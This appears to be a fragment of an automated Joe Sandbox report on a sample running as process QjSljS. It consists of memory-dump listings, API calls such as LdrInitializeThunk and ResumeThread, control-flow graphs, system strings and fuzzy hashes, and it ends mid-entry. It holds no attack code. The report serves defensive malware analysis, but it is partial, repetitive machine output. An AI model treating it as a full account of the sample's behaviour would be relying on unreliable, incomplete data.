                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 022B8C35
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost
                                                                                                • String ID:
                                                                                                • API String ID: 410705778-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0231B086
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805790883.0000000002310000.00000040.00000800.00020000.00000000.sdmp, Offset: 02310000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_2310000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 022B8C35
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805685059.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_22b0000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessagePost
                                                                                                • String ID:
                                                                                                • API String ID: 410705778-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805136892.00000000021CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_21cd000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805136892.00000000021CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_21cd000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805169397.00000000021DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021DD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_21dd000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805169397.00000000021DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021DD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_21dd000_QjSljS.jbxd
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805169397.00000000021DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021DD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_21dd000_QjSljS.jbxd
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805136892.00000000021CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_21cd000_QjSljS.jbxd
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805136892.00000000021CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_21cd000_QjSljS.jbxd
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.1805169397.00000000021DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 021DD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_21dd000_QjSljS.jbxd
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Execution Graph

                                                                                                Execution Coverage:0%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:1
                                                                                                Total number of Limit Nodes:0
                                                                                                execution_graph 60911 1472b60 LdrInitializeThunk

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 0 1472c0a-1472c0f 1 1472c11-1472c18 0->1 2 1472c1f-1472c26 LdrInitializeThunk 0->2
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(0148FD4F,000000FF,00000024,01526634,00000004,00000000,?,-00000018,7D810F61,?,?,01448B12,?,?,?,?), ref: 01472C24
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 8 14735c0-14735cc LdrInitializeThunk
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 4 1472b60-1472b6c LdrInitializeThunk
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(014A0DBD,?,?,?,?,01494302), ref: 01472B6A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 7 1472df0-1472dfc LdrInitializeThunk
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(014AE73E,0000005A,0150D040,00000020,00000000,0150D040,00000080,01494A81,00000000,-00000001,-00000001,00000002,00000000,?,-00000001,0147AE00), ref: 01472DFA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 6 1472c70-1472c7c LdrInitializeThunk
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(0142FB34,000000FF,?,-00000018,?,00000000,00004000,00000000,?,?,01487BE5,00001000,00004000,000000FF,?,00000000), ref: 01472C7A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 5 1472c1d-1472c26 LdrInitializeThunk
                                                                                                APIs
                                                                                                • LdrInitializeThunk.NTDLL(0148FD4F,000000FF,00000024,01526634,00000004,00000000,?,-00000018,7D810F61,?,?,01448B12,?,?,?,?), ref: 01472C24
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                 • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmp
                                                                                                 • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmp
                                                                                                 • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmp
                                                                                                 • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                                                                                                 • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                 • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmp
                                                                                                 • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID:
                                                                                                • API String ID: 2994545307-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 9 429bae-429bca 10 429bd9-429be0 9->10 11 429bef-429bf4 10->11 12 429c43-429c48 11->12 13 429bf6-429bff 11->13 14 429c0e-429c13 13->14 15 429c26-429c2c 14->15 16 429c15-429c23 14->16 18 429c32-429c40 15->18 16->15 18->12
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1906695680.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_429000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: n
                                                                                                • API String ID: 0-2013832146
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 20 429bb3-429bf4 23 429c43-429c48 20->23 24 429bf6-429c13 20->24 26 429c26-429c2c 24->26 27 429c15-429c23 24->27 29 429c32-429c40 26->29 27->26 29->23
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1906695680.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_429000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: n
                                                                                                • API String ID: 0-2013832146
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 31 429dc6-429dd9 32 429e36-429e3c 31->32 33 429ddb-429e04 31->33 35 429e10-429e35 32->35 36 429e3e-429e3f 32->36 35->32 37 429e41-429e64 36->37 37->37 38 429e66-429e67 37->38 39 429ee1 38->39 40 429e69-429e6d 38->40 41 429e6e-429e78 39->41 42 429ee3-429eeb 39->42 40->41 43 429f2c-429f5e 42->43 44 429eed-429eef 42->44 45 429f64-429f75 43->45
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1906695680.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_429000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 46 429ee8-429eee 47 429ef0-429ef2 46->47 48 429ebb 46->48 49 429ef4-429efb 47->49 50 429f49-429f5e 47->50 51 429ed3-429ed6 48->51 52 429ebd-429ec5 48->52 53 429f13-429f16 49->53 54 429efd-429f05 49->54 55 429f64-429f75 50->55 52->51 56 429ec7-429ed1 52->56 54->53 58 429f07-429f11 54->58 56->51 57 429ed7-429edc 56->57 57->51 60 429ede-429ee7 57->60 58->53 59 429f17-429f1d 58->59 59->53 61 429f1f-429f23 59->61
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1906695680.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_429000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 62 429f24-429f2f 63 429f35-429f5e 62->63 64 429f64-429f75 63->64
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1906695680.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_429000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 65 429f33-429f5e 66 429f64-429f75 65->66
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1906695680.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_429000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 67 429fc3-429fd6 68 429fdc-429fe0 67->68
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1906695680.0000000000429000.00000040.00000400.00020000.00000000.sdmp, Offset: 00429000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_429000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                 • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmp
                                                                                                 • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmp
                                                                                                 • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmp
                                                                                                 • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                                                                                                 • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                 • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmp
                                                                                                 • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: ___swprintf_l
                                                                                                • String ID:
                                                                                                • API String ID: 48624451-0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Strings
                                                                                                • SsHd, xrefs: 0144A3E4
                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 014979D0, 014979F5
                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014979FA
                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 014979D5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                                                                • API String ID: 0-929470617
                                                                                                • Opcode ID: 3bfd6640b7ef4abf37bbf650cd9ce816528c8fa08e1b86a718f562ec002383b9
                                                                                                • Instruction ID: c7d494b778ecefd769842644bc52df1d68fca014b5455d22fb80708460cdd14a
                                                                                                • Opcode Fuzzy Hash: 3bfd6640b7ef4abf37bbf650cd9ce816528c8fa08e1b86a718f562ec002383b9
                                                                                                • Instruction Fuzzy Hash: 15E1A3716443018FFB25CE68C884B6BBBE1BB84354F244A2FE996CB3A1D735D9458B81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                • RtlpFindActivationContextSection_CheckParameters, xrefs: 01499341, 01499366
                                                                                                • GsHd, xrefs: 0144D874
                                                                                                • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0149936B
                                                                                                • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01499346
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                • API String ID: 3446177414-576511823
                                                                                                • Opcode ID: 08a7d7640716cbe69a69852c984f321b55681c1c1a544f45c7a5aae38c5ffed1
                                                                                                • Instruction ID: 0251514911f9ce60b4fb0caf1d6a501b38864b60f23cac73263daed4b864dd06
                                                                                                • Opcode Fuzzy Hash: 08a7d7640716cbe69a69852c984f321b55681c1c1a544f45c7a5aae38c5ffed1
                                                                                                • Instruction Fuzzy Hash: 77E1B175A043028FEB25CF59C480B6BBBE5BF98318F04492EE995CB3A1D771E845CB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: __aulldvrm
                                                                                                • String ID: +$-$0$0
                                                                                                • API String ID: 1302938615-699404926
                                                                                                • Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                                • Instruction ID: b632b0a6adb3ea7718f487897bfcf05c7f871ba78d0ecaad227d02c259121db0
                                                                                                • Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
                                                                                                • Instruction Fuzzy Hash: 9081B070E052499EEF258E6CC8917FFBBB2EF45320F18425BD965A73B1C73498418B62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000012.00000002.1908378744.0000000001426000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001400000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001407000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001480000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001486000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.00000000014C2000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001523000.00000040.00001000.00020000.00000000.sdmp
                                                                                                • Associated: 00000012.00000002.1908378744.0000000001529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_18_2_1400000_QjSljS.jbxd
                                                                                                Similarity
                                                                                                • API ID: DebugPrintTimes
                                                                                                • String ID: $$@
                                                                                                • API String ID: 3446177414-1194432280
